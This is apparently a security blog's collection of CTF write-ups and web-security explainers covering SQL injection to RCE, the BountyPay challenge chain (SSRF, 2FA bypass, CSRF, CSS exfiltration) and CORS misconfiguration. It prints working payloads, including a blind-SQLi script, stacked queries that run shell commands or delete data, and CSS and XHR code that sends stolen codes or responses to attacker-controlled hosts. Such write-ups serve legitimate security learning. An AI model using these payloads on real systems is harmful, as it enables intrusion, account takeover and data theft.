UNION based attack: Union based SQL injection allows an attacker to extract information from the database by extending the results returned by the original query. The Union operator can only be used if the original/new queries have the same structure (number and data type of columns). (https://sqlwiki.netspi.com/injectionTypes/unionBased/#mysql)

Now we think how would this query work? And start coming up with some theories

// I think the query is performed like this
SELECT image_name FROM a_table WHERE id=number

This query will return the file name and then this file name will be looked up and returned, so using a union we might be able to trick the DB into handing us some other files if we just give it a filename that is interesting - this is where that docker image comes in handy, we know there is a main.py file and we also know the file structure - so here is my payload, I had to give it an id that didn’t exist so my UNION would work.

/fetch?id=-1 UNION select '/../../main.py'

This handed me the file and the flag was a comment.

Flag1: SQLi + LIKE argument

Had to figure out a way to get the filename from that hidden kitty - the filename turned out the be flag. I worked on the assumption that the file name was what was triggering a 500 server error.

I wrote the following ruby script, it uses the httparty library to make a request to the challenge instance, the function check? creates the url by inserting the str variable into the request, we can use the LIKE SQL command to match the current str to the filename, if the filename contains the string inside the variable we should get a 500 server error, the response.code == 500 line will return true if the response code is 500 and false if it is anything else, which is what we want. The key here is knowing that the 500 error can be used to get the filename.

I created the range of alphanumerical characters including capital letters using a range in ruby, then I initialized the payload variable which eventually would hold the complete payload. In this infinite while loop, I’m sure there is a better way of doing this, I tested each character in the range and passed it to the check? function if it returned a 500 that character would get added to my payload string and then I would test for the next character including the previous successful one payload+nextCharacter, if the character returned anything other than a 500 it would just get skipped, iterating through these characters until nothing more was being added to the string gave me the full filename - which turned out to be the flag

require 'httparty'

def check?(str)
  resp = HTTParty.get("http://34.94.3.143/a5648e58cd/fetch?id=-1 UNION SELECT filename FROM photos WHERE filename LIKE '#{str}%' AND id=3")
  puts resp.code.to_s
  if resp.code == 500
    return true
  else
    return false
  end
end

CHARSET = ('A'..'Z').to_a + ('a'..'z').to_a + ('0'..'9').to_a
payload = ''

loop do
  CHARSET.each do |c|
    puts "Trying: #{c} for #{payload}"
    test = payload + c
    next unless check?(test.to_s)

    payload += c
    puts payload
    break
  end
end

Flag2: SQLi, Stacked queries

Assumption:
We have to update some document, and we also need to make sure we used stacked queries, and use the commit command to apply the changes, there is something weird about that subprocess call - it runs commands on the computer which is never a good thing - also the way is written I think I can end the quote and add my payload there by creating an album with a weird name.

Got to delete all images using:

http://35.190.155.168:5001/8ab77dbb88/fetch?id=1;%20DELETE%20%20FROM%20photos;%20commit;

Using the ;DELETE FROM photos; commit; query I was able delete all images from the photos table
I think the vulnerability in the way the size of the albums gets calculated is here:

rep += '<i>Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\n', 1)[-1] + '</i>'

After deleting all the images my method won’t work to update them though, should be thinking about how can I create a new album.

Current payload:

/fetch?id=1; INSERT INTO photos (title, filename) VALUES ('; ls')', 'cat.png'); commit;

Not working:

I get a 404 because it tries to find that id
The payload is not correct, I think that I can close that subprocess function by inserting a title containing the ‘;’ + the os command I want to run and closing the ‘’)’ - I think this should execute the command I want and send the result back

Questions: Since I deleted everything in the table how can I insert a new one - or should I just restart with all the images and update one of them?

Here is the payload that worked after changing the name of the id=3 image which contained FLAG1 - I deleted the other images and only worked with the image with id=3 but it could have been any image.

fetch?id=1; UPDATE photos SET filename="; grep -r FLAG ." WHERE id=3; commit;

However right now I can’t seem to find the flag that I need, also this was truncating my results because of this

strip().rsplit('\n', 1)[-1]

This looks promising - this was nothing lol

fetch?id=1; UPDATE photos SET filename=";grep -rl 'FLAG' /var" WHERE id=3; commit;
Got this file
/var/lib/mysql/level5/photos.ibd

fetch?id=3; UPDATE photos SET filename=";echo $(grep -r 'FLAG' /../) " WHERE id=3; commit;
// al the files inside the /app directory
Space used: Dockerfile files main.py main.pyc prestart.sh requirements.txt uwsgi.ini

Still need to find this flag but I have RCE on the server so eventually I will find it - just need to figure out where it is

Haha @ 7:50 on 3/13/2019:
I got around the truncated answers by using echo to print the results of the command I ran.

This is the payload that worked.

fetch?id=3; UPDATE photos SET filename=";echo $(printenv)" WHERE id=3; commit;
// payload worked - all 3 flags in printenv

// end

h1 2006 ctf

pirateducky — Thu, 11 Jun 2020 18:03:32 +0000

As before the CTF started with a tweet from the H1 account - CEO @martenmickos needs to approve the May bug bounty payments but he lost his credentials for BountyPay - I might be able to help.

summary

I was able to retrieve the CEO's account & pay the hackers by using a chain of exploits:

information disclosure(github repo) → account takeover(brian.oliver) + 2FA bypass -> ssrf to download private apk → token leaked in apk → account takeover(sandra.allison) + privilege escalation(csrf) → account takeover(marten.mickos) + 2FA bypass

password: h&H5wy2Lggj*kKn4OD&Ype

details

There's a H1 page for the program so let's check out the scope

scope: *.bountypay.h1ctf.com

That's a wide scope - the best thing to do is to start with some subdomain enumeration, let's see what else is under that bountypay subdomain:

api.bountypay.h1ctf.com
- requires a token
- /redirect?url=
www.bountypay.h1ctf.com
- sign-in portal
software.bountypay.h1ctf.com
- apk is hosted here
- only accessible from known IP
staff.bountypay.h1ctf.com
- staff portal
app.bountypay.h1ctf.com
- customer portal
- 2 Factor Auth. is enabled

foothold

After going through the subdomains and doing some directory bruteforcing - there was a 403 error that looked promising: app.bountypay.h1ctf.com/.git/

If you hit http://app.bountypay.h1ctf.com/.git/HEAD you can download the HEAD file - now we just need to get something with more information for us, let's try https://app.bountypay.h1ctf.com/.git/config This discloses some information:

[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
[remote "origin"]
    url = https://github.com/bounty-pay-code/request-logger.git
    fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
    remote = origin
    merge = refs/heads/master

This config file discloses a github repository with some interesting information

<?php

$data = array(
  'IP'        =>  $_SERVER["REMOTE_ADDR"],
  'URI'       =>  $_SERVER["REQUEST_URI"],
  'METHOD'    =>  $_SERVER["REQUEST_METHOD"],
  'PARAMS'    =>  array(
      'GET'   =>  $_GET,
      'POST'  =>  $_POST
  )
);

file_put_contents('bp_web_trace.log', date("U").':'.base64_encode(json_encode($data))."\n",FILE_APPEND   );

A few things to note here:

Application uses PHP
Writes to a log file that we can access from https://app.bountypay.h1ctf.com/bp_web_trace.log in it we can see the following:
- The values are encoded using base64
- "username":"brian.oliver",
- "password":"V7h0inzX",
- "challenge_answer":"bD83Jk27dQ"

app.bountypay.h1ctf.com

Using the username/password works and we can now log into [app.bountypay.h1ctf.com](http://app.bountypay.h1ctf.com) however...there's 2 Factor Auth we'll need to bypass it.

<!-- relevant html from above-->
...
<!-- user's name -->
<input type="hidden" name="username" value="brian.oliver">
<!-- user's password -->
<input type="hidden" name="password" value="V7h0inzX">
<!-- MD5 hash of the 10 char passcode sent to the user for verification -->
<input type="hidden" name="challenge" value="103fa83db8f4be6c61dee66f95e2bca0">
...

We can assume the application will send a verification code but how can we grab it?

I had not noticed but the challenge value is 32 chars - after some time I realized MD5 hashes have 32 chars, if we replace the challenge value for the MD5 hash of the challenge_answer we found in the logs(bD83Jk27dQ) we can use this old token to gain access to the account. With this we can log into app.bountypay.h1ctf.com

app.bountypay.h1ctf.com

The user brian.oliver has access to this application, however there wasn't much else so I started looking at api calls - I noticed the /statements?month=04&year=2020 request which was in the log file from before, and this is what it returned:

{
   "url":"https:\/\/api.bountypay.h1ctf.com\/api\/accounts\/F8gHiqSdpK\/statements?month=01&year=2020",
   "data":"{\"description\":\"Transactions for 2020-01\",\"transactions\":[]}"
}

Looks like it's using api.bountypay.h1ctf.com to get the information and then it returns a data object with the information - let's remember this and keep going.

Eventually I looked at the Cookie values, and with some nudges noticed there was a path traversal in the cookie, which was just base64 json, the account_id probably gets passed to the api call to get the right account - this is when the /redirect?url= route from api.bountypay.h1ctf.com came in handy since before we couldn't make any interesting requests because there was a whitelist - here it's also important to note the software.bountypay.h1ctf.com subdomain which you can't access because there's an IP restriction(I tried the X-Forward-Host but it didn't work), taking that into consideration - let's try to make an internal request to that subdomain by using the following base64 encoded payload:

// decoded cookie
{"account_id":"8FJ3KFISL3/../../../redirect?url=https://software.bountypay.h1ctf.com/BountyPay.apk#","hash":"de235bffd23df6995ad4e0930baac1a2In0"}

// request
GET /statements?month=04&year=2020 HTTP/1.1
Host: app.bountypay.h1ctf.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.bountypay.h1ctf.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: token=eyJhY2NvdW50X2lkIjoiRjhnSGlxU2RwSy8uLi8uLi8uLi9yZWRpcmVjdD91cmw9aHR0cHM6Ly9zb2Z0d2FyZS5ib3VudHlwYXkuaDFjdGYuY29tLyMiLCJoYXNoIjoiZGUyMzViZmZkMjNkZjY5OTVhZDRlMDkzMGJhYWMxYTIifQ

// response
HTTP/1.1 200 OK
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 01 Jun 2020 22:58:07 GMT
Content-Type: application/json
Connection: close
Content-Length: 1621

{"url":"https:\/\/api.bountypay.h1ctf.com\/api\/accounts\/F8gHiqSdpK\/..\/..\/..\/redirect?url=https:\/\/software.bountypay.h1ctf.com\/#\/statements?month=04&year=2020","data":"<!DOCTYPE html>\n<html lang=\"en\">\n<head>\n    <meta charset=\"utf-8\">\n    <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\n    <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n    <title>Software Storage<\/title>\n    <link href=\"\/css\/bootstrap.min.css\" rel=\"stylesheet\">\n<\/head>\n<body>\n\n<div class=\"container\">\n    <div class=\"row\">\n        <div class=\"col-sm-6 col-sm-offset-3\">\n            <h1 style=\"text-align: center\">Software Storage<\/h1>\n            <form method=\"post\" action=\"\/\">\n                <div class=\"panel panel-default\" style=\"margin-top:50px\">\n                    <div class=\"panel-heading\">Login<\/div>\n                    <div class=\"panel-body\">\n                        <div style=\"margin-top:7px\"><label>Username:<\/label><\/div>\n                        <div><input name=\"username\" class=\"form-control\"><\/div>\n                        <div style=\"margin-top:7px\"><label>Password:<\/label><\/div>\n                        <div><input name=\"password\" type=\"password\" class=\"form-control\"><\/div>\n                    <\/div>\n                <\/div>\n                <input type=\"submit\" class=\"btn btn-success pull-right\" value=\"Login\">\n            <\/form>\n        <\/div>\n    <\/div>\n<\/div>\n<script src=\"\/js\/jquery.min.js\"><\/script>\n<script src=\"\/js\/bootstrap.min.js\"><\/script>\n<\/body>\n<\/html>"}

The data json contains the login page for software.bountypay.h1ctf.com - this means we have a way to make requests inside the network, bypassing the ip restriction aka ssrf :yay:
After some time of thinking what could be there I figure it would have something to download and it made sense, a lot of companies host software on a different subdomain under /downloads, /software or in this case /uploads making the correct request yields

# decoded cookie
{"account_id":"F8gHiqSdpK/../../../redirect?url=https://software.bountypay.h1ctf.com/uploads#","hash":"de235bffd23df6995ad4e0930baac1a2"}

# request
GET /statements?month=04&year=2020 HTTP/1.1
Host: app.bountypay.h1ctf.com
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
X-Requested-With: XMLHttpRequest
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.bountypay.h1ctf.com/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: token=eyJhY2NvdW50X2lkIjoiRjhnSGlxU2RwSy8uLi8uLi8uLi9yZWRpcmVjdD91cmw9aHR0cHM6Ly9zb2Z0d2FyZS5ib3VudHlwYXkuaDFjdGYuY29tL3VwbG9hZHMjIiwiaGFzaCI6ImRlMjM1YmZmZDIzZGY2OTk1YWQ0ZTA5MzBiYWFjMWEyIn0=

# data response
"data":"<html>\n<head><title>Index of \/uploads\/<\/title><\/head>\n<body bgcolor=\"white\">\n<h1>Index of \/uploads\/<\/h1><hr><pre><a href=\"..\/\">..\/<\/a>\n<a href=\"\/uploads\/BountyPay.apk\">BountyPay.apk<\/a>                                        20-Apr-2020 11:26              4043701\n<\/pre><hr><\/body>\n<\/html>\n"

We can see what's hosted there 👀 now you can download the apk by going to: https://software.bountypay.h1ctf.com/uploads/BountyPay.apk

apk

This part was hard for me, but thanks again to Al-Madjus I was able to complete it using adb and generating intents with the correct payloads, all the information was inside the apk.

I used android studio and adb (if you have the emulator running you just need to run a shell by using adb $ adb shell)to complete the challenges:

ActivityOne
- am start -a android.intent.action.VIEW -d "one://part?start=PartTwoActivity" -n bounty.pay/.PartOneActivity
ActivityTwo
- am start -a android.intent.action.VIEW -d "two://part?two=light&switch=on" -n bounty.pay/.PartTwoActivity
ActivityThree
- am start -a android.intent.action.VIEW -d "three://part?three=UGFydFRocmVVlQWN0aXZpdHk=&switch=b24=&header=X-Token" -n bounty.pay/.PartThreeActivity
Header value: X-Token

All the params were in the apk - once you read the disassembled code you could see the flow of the program and use those to create the intents you needed - again huge thanks to AlMadjus for the help here.

After completing this challenge we have access to a leaked token: X-Token: 8e9998ee3137ca9ade8f372739f062c1 which I grabbed from the cat log from android studi.
We also know that we need to add that header with the token somewhere - if I remember correctly one of the subdomains asked specifically for a token when making requests directly to it: api.bountypay.h1ctf.com

api.bountypay.h1ctf.com

Using the new X-Token: 8e9998ee3137ca9ade8f372739f062c1 header, let's test the api endpoint and see if I can now make requests, I found the /api/staff endpoint which yields:

[{
    "name":"Sam Jenkins",
    "staff_id":"STF:84DJKEIP38"
},
{
    "name":"Brian Oliver",
    "staff_id":"STF:KE624RQ2T9"
}]

Here I took a small detour and went on twitter - the HackerOne account released some clues, including a twitter account for bountypay which only followed three accounts which included the newest employee and she even shared a pic of her cool new work badge with her STF number on it- let's use that try to use that somewhere.
In the above GET request to /api/staff we get the current employees and their staff_id which is the same format that Sandra's badge has! but she's not in the system yet? Maybe she hasn't gotten set up yet? Let's help her out. After sending an inital POST request without any parms I received this error "Missing Parameter" so what paramet can we pass? her name? I don't think so maybe her staff_id is workin - let's try it:

// POST to create an account using th STF number in the image
POST /api/staff HTTP/1.1
Host: api.bountypay.h1ctf.com
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Token: 8e9998ee3137ca9ade8f372739f062c1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded

staff_id=STF:8FJ3KFISL3

// response with username and password! 
HTTP/1.1 201 Created
Server: nginx/1.14.0 (Ubuntu)
Date: Sun, 31 May 2020 22:11:43 GMT
Content-Type: application/json
Connection: close
Content-Length: 110

{"description":"Staff Member Account Created","username":"sandra.allison","password":"s%3D8qB8zEpMnc*xsz7Yp5"}

Now we have a staff account! which should work for the staff.bountypay.h1ctf.com

staff.bountypay.h1ctf.com

With our new staff account we can sign into the staff.bountypay.h1ctf.com application, there's a few things to note here:

We get some clientside js
- /js/website.js
The account is not admin and we probably need admin rights to see more
- /template=admin gives 403
We control the profile_avatar input name since we can change it clientside however sensitive chars are filtered, we also control our user name but this wasn't of much use here
- injection is possible though

When looking at the website.js file I noticed

The upgradeToAdmin function, I tried to hit the route myself but only admins can do it (it's a GET request to /admin/upgrade?username=sandra.allison)
The sendReport function that submits a url which is generated by the app and it's base64 encoded the url is generated for each page - the modal mentions an admin will take a look at the page, this is great if we can trick the admin into making that upgrade request for us, we could become admins too.

// javascript from the application
$('.upgradeToAdmin').click(function () {
  let t = $('input[name="username"]').val();
  $.get('/admin/upgrade?username=' + t, function () {
    alert('User Upgraded to Admin')
  })
}),
$('.tab').click(function () {
  return $('.tab').removeClass('active'),
  $(this).addClass('active'),
  $('div.content').addClass('hidden'),
  $('div.content-' + $(this).attr('data-target')).removeClass('hidden'),
  !1
}),
$('.sendReport').click(function () {
  $.get('/admin/report?url=' + url, function () {
    alert('Report sent to admin team')
  }),
  $('#myModal').modal('hide')
}),
document.location.hash.length > 0 
&& ('#tab1' === document.location.hash 
&& $('.tab1').trigger('click'), '#tab2' === document.location.hash && $('.tab2').trigger('click'), '#tab3' === document.location.hash && $('.tab3').trigger('click'), '#tab4' === document.location.hash && $('.tab4').trigger('click'));}

document.hash

I spent a lot of time trying to get xss since there was an html injection in the avatar_name input value when choosing an avatar under the Profile tab. I realized I controlled a field that gets echoed back as a class and if I could just trigger the .upgradeToAdmin function, I might be able to store that in the profile_avatar variable that I control, the last part was getting the admin to make the request.

How do we trigger the function though?
Well since we control a class and there's a class that get's used in the jquery above to check the tabs and then fire their click events could we take advantage of that event and use it for our purposes? Yes we can!

By setting a avatar with the avatar_name input value to tab1 upgradeToAdmin and then accessing the hash we set in our avatar_name directly https://staff.bountypay.h1ctf.com/#tab1 this makes the click event propagate, and it even makes the request for us since it fires off the click event for upgradeToAdmin however - we are missing something:

// upgradeToAdmin function 
let t = $('input[name="username"]').val();

The function needs to grab the username from an input field, I knew I was on the right track because I could see the request to /admin/upgrade?username=undefined. The undefined happened because the function that triggered the request grabs the username from an input field named username which is no where in the application - or is it?

the event propagation surprised me and at first I didn't understand it but after debugging the jquery it hit me that since the location hash was being used to fire off a click event the event propagation would make any class that was in the same element fire off any click events that were associated with that class and luckily for us the request we need to make is handled by a click event bound to a class - with our injection we can inject the class that starts the click event and then the class name that fires our get request

input[name='username'].val()

This is the last part before we can send our admin a malicious link that will upgrade us, but how can we get that username parameter?
The only input with the username value is the login page - I knew we had to include that page since there's no other way, and we know we are using templates because the route we are on is /?template=home since we need to pull multiple templates I thought about array params - which even hackerone uses and made the following request https://staff.bountypay.h1ctf.com/?template[]=home&template[]=login

Building up from this we can change our payload slightly to fill in the username and make sure we direct the admin to a page where our username will be seen since the only part of the application that is not in the /template=home is the ticket where our username is available to the admin and we need to make sure the class we set is seen by the admin to trigger the attack so let's just send the admin there with our full payload:

https://staff.bountypay.h1ctf.com/?template[]=login&username=sandra.allison&template[]=ticket&ticket_id=3582#tab2

This will take the admin to the ticket template but will also pull in the login template and use the input field with our username - now when the admin receives this payload it will trigger the attack, to do this we can send a report to /admin/report?url=base64 the base64 will be our payload since that includes our malicious link - now this will trigger the admin to make the upgrade request and we will become application admininstrator:

Now all we need is to set the avatar_name value to tab2 upgrateToAdmin in the profile tab, submit the change, and then send the report to the admin:

https://staff.bountypay.h1ctf.com/admin/report?url=Lz90ZW1wbGF0ZVtdPWxvZ2luJnVzZXJuYW1lPXNhbmRyYS5hbGxpc29uJnRlbXBsYXRlW109dGlja2V0JnRpY2tldF9pZD0zNTgyI3RhYjE=

This request will trigger the upgradeToAdmin from the admin's side - giving us admin rights!

Admin

Now that we are admin there's a new tab! With the CEO's account and password (which he forgot - should have been admin:admin)

So what's left to do? Login of course! this account will work in app.bountypay.h1ctf.com - when you login you'll need to bypass the 2FA again this time we don't have a used security code so just make one up 12345aBcDF= b3e2bc9cbb5e0b624816fa0ee19a7993 exchange the challenge value for the md5 hash and it should allow you to log in - now let's pay those hackers!

If you try to use the pay button you'll be redirected to...another 2FA - this one is not as easy as a md5 hash. Let's take a look at the 2FA page and html that we got to work with

...
<!--important part -->
<form method="post">
<input type="hidden" name="app_style" value="https://www.bountypay.h1ctf.com/css/uni_2fa_style.css">
...

This snippet caught my eye - they're sending the styling for what I believe is the 2FA application to grab the code - I replaced the css link and put a burp collaborator link to see if I could get a response from wherever that request ended up at and...

Now we're talking - but this was done through a css link, also how in the f*** do I exfiltrate this with just css?

One thing I noticed from the css that was originally there was the rules and comment from the css style made me think that I needed to steal a token from an application that looked like your typical 2FA app with multiple input fields: [][][][][][][]

css data exfiltration

Who would I tell I'd be exfiltrating information using css selectors - 2020 is a strange year.

Realizing that was a posibility thanks to d0nut and the blog he wrote here. I could technically add my own css stylesheet by submitting one in a server I controlled - with this and some crafty payloads I was able to grab all the inputs

I was able to find the chars I needed by:

hosting a css file with my payloads on a server I controlled (I used netlify since they give u a server in which you can host js, css files, and comes with a SSL cert)
payloads were generated based on the criteria I needed
- charset: [a-z][A-Z][0-9]
- 7 characters (that's how many fit in the input field)
- Generated a list that would only execute the css rule each time a match was found, when the css selector would find a match it would execute the rule which in this case made a request to the collaborator along with the match and the placement.
- burp helped since I attached the current character and place (based on the nth-of-type(n) selector)
- Example payload
  - input[value=a]:nth-of-type(1){background-image:url("https://hellothere.burpcollaborator.net.burpcollaborator.net?char=a&order=1");}
  - if the css found that the first input had a value of a I would get a callback to my collaborator instance with the character and it's index
- I had about 400 css rules

# creates a wordlist with css rules to find the auth code
chars = (0..9).to_a + ('A'..'Z').to_a + ('a'..'z').to_a

puts "server/burp collaborator"

server = gets.chomp
for i in 0..6
    chars.each do |char|
        puts "input[value=#{char}]:nth-of-type(#{i + 1}){background-image:url('#{server}/?char=#{char}&index=#{i + 1}');}"
    end
end

This took...a few tries but finally I managed to grab the right code and....

Automation

After completing the CTF the next part is writing the report which is what this is, and for the final part - the proof of concept. In a good report there is always a PoC or proof of concept, this can be a bash script, curl command or in my case a ruby script. Which shows the triager how to execute the attack.

[link to script]

I chose ruby because I like it - I've been learning how to use it for the past year and it was fun implementing something like this in ruby. I used a few libraries like httparty and nakogiri to make requests and parse html, the flow of the script follows this reports, starting with the information disclosure in the logs and ending with getting the flag - the only harcoded value here is the X-Token since I didn't know how to automate the android part, but the token is always the same. The script was a lot of fun to create but the most interesting part of this was automating the stealing of the last 2fa code by using css selectors.

retrieving 2FA code

In the report above we figured out that we could steal the 2FA code which allows us to pay the hackers, but automating this part seemed too hard for me so I thought I wouldn't do it, but after some ideas I figured out how to do it. Let's go over the attack again:

Send a request with a css stylesheet you can control
Steal inputs
- not all 7 inputs can be found all the time
submit the request with the 2fa code in under 2 minutes

We can solve the first 2 at the same time, I created a css style sheet and place it here https://clever-payne-76dd96.netlify.app/payload.css this stylesheet has payloads like the following:

input[value=0]:nth-of-type(1){background-image:url('https://patopirata.com/?data=0&index=1');}

By using css selectors we can go over each character we need for our code and also go over all 7 input fields, since only the valid rules will execute our server will only get the inputs that can be found - this means that when we don't have 7 inputs we will need to redo the attack until we have them, but we also need a way to catch the requests that are generated by the inputs we find - for exploitation burp collaborator worked but how can we automate this?

To automate the retrieval of the 2fa code we need a server we control that can log the requests sent each time we perform the attack, fortunately I already had something written here - this is a simple nodejs server that I was using to test some cors issues - but it's all set up and ready to go.

// get the items in the query from the css requests that are valid
// this step will give us all the inputs that got caught and their place 
var code = []
...
exports.getCode = (req, res) {
  code.push(req.query)
  ...
}
...

Now we need a way to put the code together and send the code when it's ready

exports.replyCode = (req, res) => {

    console.log(code.length)
    var one, two, three, four, five, six, seven

    if (code.length == 7) {
        code.map(function(obj) {
            switch (obj.index){
                case "1":
                    one = obj.data
                break;
                case "2":
                    two = obj.data
                break;
                case "3":
                    three = obj.data
                break;
                case "4":
                    four = obj.data
                break;
                case "5":
                    five = obj.data
                break;
                case "6":
                    six = obj.data
                break;
                case "7":
                    seven = obj.data
                break;
            }
        })
        var full_code =`${one}${two}${three}${four}${five}${six}${seven}`
        res.status(200).send(full_code)
    } else {
        res.status(404).send("")
        return code = []
    }

}

This horrible thing puts each char. into the right place and makes the full code available in /replyCode when it's ready.

With all this and some ruby magic we can now automate the full exploit:

Thoughts

I just want to say thank you to H1 and everyone involved in making these challenges, my first one was back in 2018 for the DefCon event, and I failed miserably. I told myself I would give it my best and I think I did just that. The CTF was fun and had innovative challenges that tested my skills and made me learn new ones (looking at android and css).

gitlab repo with script

origin/sop/cors

pirateducky — Tue, 09 Jun 2020 21:30:06 +0000

intro

Let's talk about cors, sop and origin and how these security measures can lead to vulnerabilities in your application.

example

How are cross origin requests handled in the real world? Applications have to talk to each other to exchange information, imagine http://example.com needs to get some information from http://api.example.com/v1/getUsers, when this request is made from http://example.com the origins are different so we have to have a way to make these requests, since usually SOP (same origin policy) would not allow it. The answer to this problem is cors (cross origin resource sharing) which allows for communication across origins.

same origin policy (SOP)

The same origin policy is a central part of browser security, it handles how resources with different origins interact with each other. An origin is said to have the same origin only if the protocol , port and host match, that means that http://example.com and http://example.com/assets/css/styles.css have the same origin since the requirements are met, however https://api.example.com/getUsers does not meet the requirement and therefor requests made from http://example.com will fail.

Same origin policy is important since when an application makes a request to a new origin all cookies, auth. headers and information is passed down with the request - which means that if you allow the wrong origin a user might visit a malicious website which could steal their data.

key concepts:

Trust
- <script src='https://example.com/lib.js'></script>
  - when the user agent processes the script element the script will be fetched with the same privileges as the document
  - user agents also send information to server using URIs (forms for example)
Origin
- Two URI's share the same origin when the scheme, host, and port are the same
Authority
- Not every resource in an origin has the same authority
  - an image is passive content and has no authority, the image has no access to the objects and resources available to its origin
  - HTML documents carry the full authority of their origin, the document can access every object in its origin
  - User agents determine how much authority to grant a resource by checking its media type (ie images get no authority but javascript files get full authority of the page)
- Policy
  - User agents isolate different origins
    - Object Access: content retrieved from one URI can access objects associated with content retrieved from another URI if and only if the two URIs belong to the same origin
    - Generally reading information from another origin is forbidden
    - Network resources can opt-in into letting other origins read their information (cors)
      - Access is granted in a per-origin basis

cross origin resource sharing (CORS)

To be able to make requests to an application on a different origin we need to have:

A response with the Access-Control-Allow-Origin header, with the origin of where the request originated from as the value
- user agent validates that the value and origin of where the request originated match
- user agents can discover via a preflight request wether a cross-origin resource is prepared to accept requests from a given origin
- server-side applications are enabled to discover that an http request was deemed a cross-origin request by the user agent, through the Origin header

cors attacks

When testing for these configuration mistakes is always important to note that if the Access-Control-Allow-Credentials does not come back in our response but the Access-Control-Allow-Origin still gets reflected this does not mean the endpoint is vulnerable to data exfiltration since you need to have those creds being passed in the request.

server side generated ACAO (Access-Control-Allow-Origin) headers

applications might need to communicate with other services outside their own origin - in some cases the Origin header from a request is used to populate the Access-Control-Allow-Origin in the response by the server, which would allow the cross origin request, however since the Origin can be manipulated from the client side - in this case we could set the Origin to something we control:

// request with the origin we control
GET /v1/getApiKey HTTP/1.1
Host: http://example.com
Origin: http://evildomain.com
Cookie: session='...'

// response that reflects the origin
HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://evildomain.com
Access-Control-Allow-Credentials: true

If we are able to get a response like the one above from a request we control, we can go ahead and create a PoC in a server we control, for this I have used webhook and a vps, though you could just use trustedSec's PoC since that will guarantee any private information doesn't leave your control, but the methodology of the PoCs are the same:

Create an XMLHttpRequest request object(or fetch request)
create a listener that fires when the page loads using .onload, this function will exfiltrate the data to our server
Set the the vulnerable URI and method using the .open method
Set the .withCredentials method on the request object
Send the request using .send


// Create an XMLHttpRequest request object(or fetch request)
var req = new XMLHttpRequest();
// create a listener that fires when the page loads
req.onload = reqListener;
// set method and uri for the request
req.open('GET', 'http://vulnerable.com/api/getKey');
// allow credentials - this will pass cookies to our request
req.withCredentials = true;
// send our request
req.send();

// this function will execute when the page loads
function reqListener() {
  location='//webhook.site/123-12.../?data='+this.responseText);
}

You can monitor your webhook.site instance and you should see the request with the responseText and from the vulnerable site

regex

While the above is the best case scenario for an attacker I have only found a few instances where that is the case, something that happens more often is when an application has subdomains that it needs to talk to: api.example.com , auth.example.com and example.com need to be able to share resources, and that can be achieved by using cors - the developer sets up some code that allows cross-origin-resource-sharing only from subdomains in example.com

// server code
...
var origin = req.header('Origin')
var regex = /https:\/\/[a-z]+.example.com/

if (regex) {
  res.header(`Allow-Access-Control: ${origin}`)
  res.header('Access-Control-Allow-Credentials: true')
}
...

In the above code the origin is checked using a regex, if the origin would be [evildomain.com](http://evildomain.com) the regex would fail and the if-statement block wouldn't execute, however the regex here has a side effect in that it interprets . as:

The . metacharacter is shorthand for a character class that matches any character. It is very convenient when you want to match any char at a particular position in a string.

Which means that our regex would match [https://evildomainexample.com](https://evildomainexample.com) and would execute the if statement, giving us control of the origin and allowing us get user requests with possible sensitive information

postMessage()

this is a bit different but it deals with the origin passed to postMessage() and it's a way to get around cors issues that introduces some vulnerabilities as well

The window.postMessage() method safely enables cross-origin communication between Window objects; e.g., between a page and a pop-up that it spawned, or between a page and an iframe embedded within it.

syntax

targetWindow.postMessage(message, targetOrigin, [transfer]);

If * is passed as the targetOrigin parameter this discloses the data you send to any website that sets up a listener.

A really cool example of this is @fransrosen's report on H1's Marketo's form which used a postMessage() function with no origin set - so it was possible to listen to data being sent to the H1 form.

thoughts

Origin is complex - because web applications need to communicate and share resources with other applications, this introduces ways of bypasing same-origin-policy like cors and postMessage which is awesome but if misconfigured it could leave your application's users vulnerable to having possibly sensitive data stolen.

resources

https://blog.detectify.com/2018/04/26/cors-misconfigurations-explained/
https://www.corben.io/tricky-CORS/
https://hackerone.com/reports/207042
https://developer.mozilla.org/en-US/docs/Web/API/Window/postMessage
https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS
https://www.w3.org/wiki/CORS
https://tools.ietf.org/html/rfc6454
https://medium.com/bugbountywriteup/cors-one-liner-command-exploiter-88c06903cca0

intro to xss

pirateducky — Thu, 07 May 2020 18:12:33 +0000

introduction to cross-site scripting(xss), basics, methodology, dangers & mitigations

This was written as part of my application to SecAppDev 2020 which got cancelled due to the current pandemic

What is XSS?

Cross-site scripting or XSS, is a vulnerability which allows an attacker to inject & execute malicious code, usually javascript, into an application under the victim's context, it is listed under the OWASP Top 10 Vulnerabilities as #7, some popular types of XSS are:

reflected
- The application is reflecting some unsanitized data that it received through a parameter directly in the response
